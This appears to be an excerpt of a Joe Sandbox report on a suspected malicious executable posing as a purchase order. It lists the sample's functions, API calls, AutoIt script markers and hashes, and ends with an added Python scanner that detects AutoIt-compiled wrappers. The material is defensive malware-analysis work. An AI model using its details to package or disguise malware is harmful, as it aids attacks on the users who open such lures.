                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                  Strings
                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                  • String ID: NULL Pointer assignment
                                  • API String ID: 440038798-2785691316
                                  • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                  • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                  • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                  • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                  Control-flow Graph

                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                  • String ID: 0SH
                                  • API String ID: 3363477735-851180471
                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                  APIs
                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsThemeActive$uxtheme.dll
                                  • API String ID: 2574300362-3542929980
                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                  • TranslateMessage.USER32(?), ref: 00409556
                                  • DispatchMessageW.USER32(?), ref: 00409561
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchSleepTranslate
                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                  • API String ID: 1762048999-758534266
                                  • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                  • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • __wcsicoll.LIBCMT ref: 00402007
                                  • __wcsicoll.LIBCMT ref: 0040201D
                                  • __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                  • __wcsicoll.LIBCMT ref: 00402049
                                  • _wcscpy.LIBCMT ref: 0040207C
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104), ref: 00428B5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe$CMDLINE$CMDLINERAW
                                  • API String ID: 3948761352-3349250007
                                  • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                  • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_fseek_wcscpy
                                  • String ID: D)E$D)E$FILE
                                  • API String ID: 3888824918-361185794
                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcsncat.LIBCMT ref: 0040E433
                                  • __wmakepath.LIBCMT ref: 0040E44F
                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _wcscpy.LIBCMT ref: 0040E487
                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • _wcscat.LIBCMT ref: 00427541
                                  • _wcslen.LIBCMT ref: 00427551
                                  • _wcslen.LIBCMT ref: 00427562
                                  • _wcscat.LIBCMT ref: 0042757C
                                  • _wcsncpy.LIBCMT ref: 004275BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                  • String ID: Include$\
                                  • API String ID: 3173733714-3429789819
                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                  Control-flow Graph

                                  APIs
                                  • _fseek.LIBCMT ref: 0045292B
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452961
                                  • __fread_nolock.LIBCMT ref: 00452971
                                  • __fread_nolock.LIBCMT ref: 0045298A
                                  • __fread_nolock.LIBCMT ref: 004529A5
                                  • _fseek.LIBCMT ref: 004529BF
                                  • _malloc.LIBCMT ref: 004529CA
                                  • _malloc.LIBCMT ref: 004529D6
                                  • __fread_nolock.LIBCMT ref: 004529E7
                                  • _free.LIBCMT ref: 00452A17
                                  • _free.LIBCMT ref: 00452A20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                  • String ID:
                                  • API String ID: 1255752989-0
                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004104FE
                                  • 6FD933E0.COMCTL32(004A90E8), ref: 0041051B
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • 6FD9C400.COMCTL32(00C368F0,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Register$A2980BrushC400ClassClipboardColorD933FormatIconLoad
                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                  • API String ID: 793726766-1005189915
                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                    • Part of subcall function 00410490: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004104FE
                                    • Part of subcall function 00410490: 6FD933E0.COMCTL32(004A90E8), ref: 0041051B
                                    • Part of subcall function 00410490: 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                    • Part of subcall function 00410490: 6FD9C400.COMCTL32(00C368F0,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Load$Icon$Register$BrushClassColor$A2980C400ClipboardCursorD933FormatImage
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 2372399384-4155596026
                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc
                                  • String ID: Default
                                  • API String ID: 1579825452-753088835
                                  • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                  • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                  Control-flow Graph (function entry 0040F5C0; graph rendering omitted)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_fseek_memmove_strcat
                                  • String ID: AU3!$EA06
                                  • API String ID: 1268643489-2658333250
                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
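The function above reads the sample with fseek/fread and carries the strings "AU3!" and "EA06", and other functions in this report open Software\AutoIt v3\AutoIt and create an "AutoIt v3" window, which is the AutoIt runtime locating its embedded compiled script. The following triage scanner is an added example, not code from Joe Sandbox or from the sample; it searches a file image for those markers. The 16-byte signature that precedes the AU3!EA06 magic in compiled AutoIt scripts is taken from public AutoIt knowledge, not from this report, and the sample buffer is constructed here for illustration.

```python
"""Triage check for an AutoIt v3 compiled-script wrapper, keyed on the
markers visible in this report (AU3!/EA06, the AutoIt registry key and
the "AutoIt v3" window class).  Added example, not part of the report."""

# 16-byte signature that precedes the script magic in compiled AutoIt
# scripts (assumption from public AutoIt knowledge; the report itself only
# shows the "AU3!" and "EA06" halves, which the runtime joins with strcat).
AU3_SIG = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
AU3_MAGIC = b"AU3!EA06"

# Secondary indicators: strings the other functions in this report use.
# They are passed to wide-char APIs, so both ASCII and UTF-16LE are tried.
SECONDARY = {
    "registry_key": "Software\\AutoIt v3\\AutoIt",
    "window_class": "AutoIt v3",
}


def find_au3_markers(data: bytes) -> dict:
    """Scan a raw file image and return every marker hit with its offset.

    script_headers: offsets of each AU3!EA06 magic.
    signed_headers: offsets of the 16-byte signature when it directly
                    precedes a magic (the strong indicator).
    indicators:     "<name>:<encoding>" -> offset of the first occurrence.
    """
    result = {"script_headers": [], "signed_headers": [], "indicators": {}}
    start = 0
    while (off := data.find(AU3_MAGIC, start)) != -1:
        result["script_headers"].append(off)
        sig_off = off - len(AU3_SIG)
        if sig_off >= 0 and data[sig_off:off] == AU3_SIG:
            result["signed_headers"].append(sig_off)
        start = off + 1
    for name, text in SECONDARY.items():
        for enc_name, needle in (("ascii", text.encode("ascii")),
                                 ("utf16", text.encode("utf-16-le"))):
            off = data.find(needle)
            if off != -1:
                result["indicators"][f"{name}:{enc_name}"] = off
    return result


def verdict(result: dict) -> str:
    """Collapse the scan result into a single triage label."""
    if result["signed_headers"]:
        return "autoit-compiled"          # signature + magic: embedded script found
    if result["script_headers"]:
        return "au3-magic-only"           # magic without signature: inspect manually
    if result["indicators"]:
        return "autoit-runtime-strings"   # runtime strings only (e.g. a stub)
    return "no-autoit-markers"


def scan_file(path: str) -> tuple[str, dict]:
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        res = find_au3_markers(fh.read())
    return verdict(res), res


# Constructed sample image (not real sample bytes): a stub header, the two
# runtime strings in UTF-16LE, and a signed script header at offset 256.
def _build_sample() -> bytes:
    buf = bytearray(512)
    buf[0:2] = b"MZ"
    wc = SECONDARY["window_class"].encode("utf-16-le")
    buf[64:64 + len(wc)] = wc
    rk = SECONDARY["registry_key"].encode("utf-16-le")
    buf[128:128 + len(rk)] = rk
    blob = AU3_SIG + AU3_MAGIC + b"\x01\x02\x03"
    buf[256:256 + len(blob)] = blob
    return bytes(buf)


SAMPLE = _build_sample()

if __name__ == "__main__":
    res = find_au3_markers(SAMPLE)
    print(verdict(res), res)
```

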